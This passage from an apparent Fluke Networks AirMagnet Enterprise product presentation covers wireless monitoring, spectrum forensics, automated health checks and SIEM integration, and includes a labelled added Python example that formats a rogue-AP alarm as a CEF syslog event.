  - Data/voice events: visualize data/voice sessions in the selected band; get details on technology, carrier, power levels, first/last seen time for every event
  - Visualize cellular band activity to verify no-wireless violations
Built-in classification database; data/voice events; automated classification
COMPLETE LAYER 1 VIEW
FORENSIC EVIDENCE
Recording: capture entire spectrum sessions for replay and analysis; retain as hard evidence for post-capture forensic investigation and analysis; record capture sessions
INFORMATION GATHERING
Root cause analysis and troubleshooting
REAL-TIME REMOTE WI-FI ANALYSIS
DIRECT CONNECT IN REAL-TIME
[Diagram: AME servers (primary / hot standby) in the data center; console running in the NOC / SOC or remotely; sensors at a remote site and a local site]
Direct connect to a sensor for live remote analysis: essential for problem investigation
Investigate WLAN behavior in real time
REAL-TIME REMOTE TRUE SPECTRUM ANALYSIS
FULL DEDICATED SPECTRUM RADIO
• for analysis and classification
• Remote spectrum interface for live troubleshooting
• Covers 2.4 GHz, 5 GHz and 4.9 GHz
• 19 classification alarms
FULL PERFORMANCE ANALYSIS
PROVIDES ROOT CAUSE AND DESCRIBES ALL DETAILS
• Overloaded channels and devices: bandwidth; association capacity
• Configuration problems: missing performance options; not supporting higher speeds
• Co-existence problems: 11n and a/b/g; b/g protection mechanisms; QoS
• Traffic problems: fragmentation; retries
• RF and interference
VIEWING THE SMART DEVICES
BYOD CLASSIFICATION
Wireless Assurance
AUTOMATED HEALTH CHECK
IDEA – SIMULATE A WIRELESS CLIENT
AUTOMATIC HEALTH CHECK BENEFITS
• Perform pre-defined tasks
• Collect metrics
• Automate
• Find out about and react to the wireless problem before your users start calling
• Generate alarms when thresholds aren't met
• Know exactly what the problem is before your users complain
• Get detailed statistics for every step of the test
TRENDING CHARTS
Trending data for the following:
• Connection time
• Authentication time
• DHCP time
• Ping time
• FTP speed
• HTTPS download speed
• HTTP download speed
EXPORT TO EXCEL
• Export your AHC trending data to Excel
• Exports daily, weekly and monthly data
• Automatically creates the Excel charts
• Exports the raw data
Reporting
MULTIPLE REPORTS
REPORTING
EVERYTHING IS AUTOMATED
SMART DEVICE LIST
3rd Party Integration
3RD PARTY INTEGRATION
MULTIPLE MECHANISMS TO PASS EVENT DATA TO EXISTING MONITORING PLATFORMS
• SNMP out (v1, v2 and v3) to popular NMS platforms
• RDEP support for Cisco tools
• Integration with SIEM products (ArcSight, etc.)
• Outputs: SNMP, syslog, email, custom
Enterprises want wireless alerts integrated into existing NOC / SOC processes and tools.
Issue if missing: no way to support existing network management operating procedures.
[Diagram: AME servers in the data center (primary / hot standby) sending SNMP, syslog, email and custom notifications]
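For the SIEM path, the practical question is what the event looks like on the wire. The following added example, written for this transcript and not code from the presentation or from Fluke Networks, serialises a WIPS alarm as a CEF event (the format ArcSight ingests) and frames it as a syslog line. The server version, signature id and the sample alarm are assumptions; the escaping rules (backslash and pipe in the header, backslash, equals sign and line breaks in the extension) are the CEF ones, and are where home-grown integrations usually break.

```python
# Added example (not Fluke/AirMagnet code): serialising a WIPS alarm for a SIEM as a CEF event
# carried over syslog. Field values in ALARM are assumed; the escaping rules are CEF's own.
import time

VENDOR, PRODUCT = "Fluke Networks", "AirMagnet Enterprise"


def esc_header(s: str) -> str:
    """CEF header fields: escape backslash and the pipe separator."""
    return s.replace("\\", "\\\\").replace("|", "\\|")


def esc_ext(s: str) -> str:
    """CEF extension values: escape backslash, equals sign and line breaks (pipes are legal here)."""
    return (s.replace("\\", "\\\\").replace("=", "\\=")
             .replace("\r", "\\r").replace("\n", "\\n"))


def alarm_to_cef(alarm: dict) -> str:
    header = "|".join(esc_header(x) for x in (
        "CEF:0", VENDOR, PRODUCT, alarm["version"],
        alarm["signature_id"], alarm["name"], str(alarm["severity"])))
    ext = " ".join(f"{k}={esc_ext(str(v))}" for k, v in alarm["extension"].items())
    return f"{header}|{ext}"


def syslog_line(cef: str, host: str, timestamp: str, facility: int = 4, severity: int = 2) -> str:
    """RFC 3164-style framing: <PRI> is facility*8 + severity (4 = auth, 2 = critical)."""
    return f"<{facility * 8 + severity}>{timestamp} {host} {cef}"


# Constructed alarm for the "Rogue AP on Network" countermeasure shown earlier in the deck.
ALARM = {
    "version": "10.0",                    # assumed server version
    "signature_id": "rogue-ap-on-wire",   # assumed signature id
    "name": "Rogue AP on Network",
    "severity": 9,                        # CEF severity is 0-10
    "extension": {
        "rt": 1364824800000,              # receipt time in epoch milliseconds
        "smac": "00:1a:2b:3c:4d:51",
        "cs1Label": "SSID", "cs1": "Free|WiFi=Guest",   # deliberately awkward SSID
        "dvchost": "sensor-floor3",
        "act": "port suppressed",
        "msg": "Wired trace matched sw-floor3 Gi1/0/17",
    },
}

if __name__ == "__main__":
    print(syslog_line(alarm_to_cef(ALARM), "ame-server", time.strftime("%b %d %H:%M:%S")))
```

The point of the awkward SSID is that the pipe must stay unescaped inside the extension while the equals sign must be escaped; doing both escapes everywhere, or neither, produces events the SIEM silently mis-parses.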
SUMMARY
COMPLEMENTARY VALUE OF AME
• Real-time 24x7 proactive troubleshooting AND security monitoring solution
• Complementary to AP vendor solutions
• Strong capability to secure mobile clients as well
• Closes all gaps (security & troubleshooting)
• Smart device (mobile device) management with BYOD classification
• AHC – active testing
• Real end-user experience analysis
• Root cause analysis and troubleshooting with built-in AirWISE intelligence
ONE-STOP SHOP FOR ALL NEEDS AND PAINS
[Diagram: the lifecycle phases Planning, Deployment & Verification, Troubleshooting & Interference and 24x7 Performance & Security, covered by Fluke Networks alongside the WLAN infrastructure vendors]
THANK YOU
Reiner Hofmann
EMEA Director Wireless/AirMagnet BU, Fluke Networks
Office: +49 7152 929 622
Mobile: +49 1520 [email protected]
Your Fluke Networks partner in Belgium (Benelux region):
[email protected] for demos & more info.